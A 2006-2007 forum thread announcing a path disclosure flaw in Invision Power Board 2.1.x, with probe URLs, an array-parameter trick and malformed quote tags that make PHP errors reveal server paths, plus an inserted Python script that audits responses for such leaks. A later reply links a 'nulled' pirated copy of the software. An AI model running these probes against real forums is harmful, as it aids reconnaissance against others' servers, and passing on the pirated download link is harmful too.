  [Announcement]   Invision Power Board v2.1.x Path Disclosure Vulnerability 08/09/2006 01:35:21 (+0700) | #1 | 21468
baothu
Elite Member

Joined: 15/09/2003 02:42:15
Messages: 57
Sorry, don't know the authors :)
Description:
A vulnerability has been reported in Invision Power Board, which can be exploited by malicious people to disclose the path of the IPB forum.


http://site.com/IPB/sources/acp_loaders/acp_pages_components.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode_legacy.php
http://site.com/IPB/sources/classes/editor/class_editor_rte.php
http://site.com/IPB/sources/classes/editor/class_editor_std.php
http://site.com/IPB/sources/classes/post/class_post_edit.php
http://site.com/IPB/sources/classes/post/class_post_new.php
http://site.com/IPB/sources/classes/post/class_post_reply.php
http://site.com/IPB/sources/loginauth/convert/auth.php
http://site.com/IPB/sources/loginauth/external/auth.php
http://site.com/IPB/sources/loginauth/internal/auth.php
http://site.com/IPB/sources/loginauth/ldap/auth.php
http://site.com/IPB/sources/sql/mysql_subsm_queries.php
http://site.com/IPB/sources/sql/mysql_queries.php
http://site.com/IPB/sources/sql/mysql_extra_queries.php
http://site.com/IPB/sources/sql/mysql_admin_queries.php

Fatal error: Class 'class_post' not found in /home/home_user/public_html/sources/classes/post/class_post_new.php on line 28
 




http://forums.site.com/index.php?showtopic=1&&st[]=

Fatal error: Unsupported operand types in /home/forumpublic_html/sources/ipsclass.php on line 3025
 



1) Post a new topic.

Content of new topic without wrapping quotes:
Code:
"[quote x='xxxxx'][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 32 bytes) in /****/**/***/*****/forums/sources/classes/post/class_post.php on line 2265

2) Post a new topic.

Content of new topic without quotes:
Code:
"[quote][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Server Error.

Note: If you do not have show errors set to ON you will get either a Server Error or a Network Error.
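
A defender-side check for the leak described in this post, as an added example that is not part of the original post or of IPB: it scans saved response bodies from your own forum for PHP error messages that expose filesystem paths. The function names and the sample responses are constructed for illustration; the error strings and URLs in the sample are the ones quoted in the post.

```python
import re

# PHP's default error format: "<level>: <message> in <file> on line <n>"
PHP_ERROR = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice):\s+(?P<msg>.+?)"
    r"\s+in\s+(?P<file>/\S+?\.php)\s+on line\s+(?P<line>\d+)"
)

def find_path_leaks(body):
    """Return one dict per PHP error message in body that exposes a server path."""
    # With html_errors on, PHP wraps the level, file and line number in <b> tags.
    text = re.sub(r"<[^>]+>", "", body)
    return [
        {"level": m["level"], "file": m["file"], "line": int(m["line"])}
        for m in PHP_ERROR.finditer(text)
    ]

def audit(responses):
    """Map each URL to the leaked paths found in its response body."""
    report = {}
    for url, body in responses.items():
        leaks = find_path_leaks(body)
        if leaks:
            report[url] = leaks
    return report

# Constructed sample: response bodies keyed by URL, as saved from your own site.
SAMPLE_RESPONSES = {
    "http://site.com/IPB/sources/classes/post/class_post_new.php":
        "<br />\n<b>Fatal error</b>:  Class 'class_post' not found in "
        "<b>/home/home_user/public_html/sources/classes/post/class_post_new.php</b>"
        " on line <b>28</b><br />",
    "http://forums.site.com/index.php?showtopic=1&&st[]=":
        "Fatal error: Unsupported operand types in "
        "/home/forumpublic_html/sources/ipsclass.php on line 3025",
    "http://forums.site.com/index.php":
        "<html><body>Topic listing</body></html>",
}

if __name__ == "__main__":
    for url, leaks in audit(SAMPLE_RESPONSES).items():
        for leak in leaks:
            print(f"{url}: {leak['level']} exposes {leak['file']}:{leak['line']}")
```

With PHP's `display_errors` directive off and `log_errors` on, the same failures are written to the server log instead of the response, and the audit comes back empty.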
 
  [Question]   Re: Invision Power Board v2.1.x Path Disclosure Vulnerability 14/09/2006 04:40:53 (+0700) | #2 | 23133
alexnguyen
Member

Joined: 26/06/2006 17:17:20
Messages: 28
Location: Vietnam Network
Is 2.1.7 affected by this?
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 28/01/2007 01:11:25 (+0700) | #3 | 38567
azulgranas
Member

Joined: 25/12/2006 19:38:59
Messages: 26
Can anyone explain this bug to me in more detail?
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 02/02/2007 05:46:19 (+0700) | #4 | 39471
minhquan1712
Member

Joined: 07/09/2006 16:17:25
Messages: 240
Hey, this bug no longer works against IPB 2.2.1. If you have a bug for that version, could you share it with me?
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 04/02/2007 03:52:13 (+0700) | #5 | 39830
HoS
Member

Joined: 03/02/2007 15:07:38
Messages: 43
This bug isn't dangerous; it only gets you a bit more information about the path.
  [Question]   Re: Invision Power Board v2.1.x Path Disclosure Vulnerability 07/02/2007 23:13:30 (+0700) | #6 | 40503
subnetwork
Member

Joined: 05/09/2004 06:08:09
Messages: 1666

alexnguyen wrote:
Is 2.1.7 affected by this?


Get the latest version of Invision Power Board
http://rapidshare.com/files/11151273/IPB221_Nulled_Konsta.rar
Server management, installation, consulting, design, and security for *nix server systems
http://chamsocmaychu.com
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 08/02/2007 02:16:41 (+0700) | #7 | 40550
nhutdm
Elite Member

Joined: 02/06/2003 12:40:50
Messages: 45
Nothing to exploit here other than finding the path of the user account on the server... Boring, huh?